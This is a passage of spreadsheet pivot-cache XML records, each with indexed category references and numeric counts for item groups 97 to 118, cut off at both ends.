    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="97"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="97"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="97"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="97"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="97"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="97"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="97"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="97"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="97"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="98"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="15"/>
    <x v="98"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="65"/>
    <x v="98"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="40"/>
    <x v="98"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="98"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="98"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="98"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="99"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="9"/>
    <x v="99"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="99"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="99"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="99"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="99"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="16"/>
    <x v="99"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="21"/>
    <x v="99"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="99"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="15"/>
    <x v="100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="35"/>
    <x v="100"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="18"/>
    <x v="100"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="73"/>
    <x v="100"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="163"/>
    <x v="100"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="100"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="100"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="101"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="101"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="101"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="101"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="15"/>
    <x v="101"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="101"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="102"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="102"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="30"/>
    <x v="102"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="102"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="102"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="103"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="103"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="103"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="103"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="103"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="104"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="104"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="104"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="40"/>
    <x v="104"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="104"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="35"/>
    <x v="105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="8"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="35"/>
    <x v="105"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="105"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="105"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="105"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="11"/>
    <x v="106"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="12"/>
    <x v="106"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="106"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="21"/>
    <x v="107"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="107"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="107"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="52"/>
    <x v="107"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="220"/>
    <x v="107"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="107"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="107"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="108"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="19"/>
    <x v="108"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="108"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="400"/>
    <x v="108"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="108"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="108"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="109"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="109"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="109"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="109"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="50"/>
    <x v="110"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="110"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="110"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="150"/>
    <x v="110"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="110"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="110"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="111"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="111"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="111"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="111"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="112"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="112"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="112"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="112"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="113"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="113"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="113"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="113"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="20"/>
    <x v="113"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="113"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="113"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="114"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="114"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="114"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="114"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="60"/>
    <x v="114"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="114"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="115"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="115"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="115"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="116"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="116"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="116"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="116"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="116"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="116"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="117"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="117"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="117"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="9"/>
    <x v="117"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="78"/>
    <x v="117"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="117"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="117"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="118"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="118"/>
  </r>
  <r>
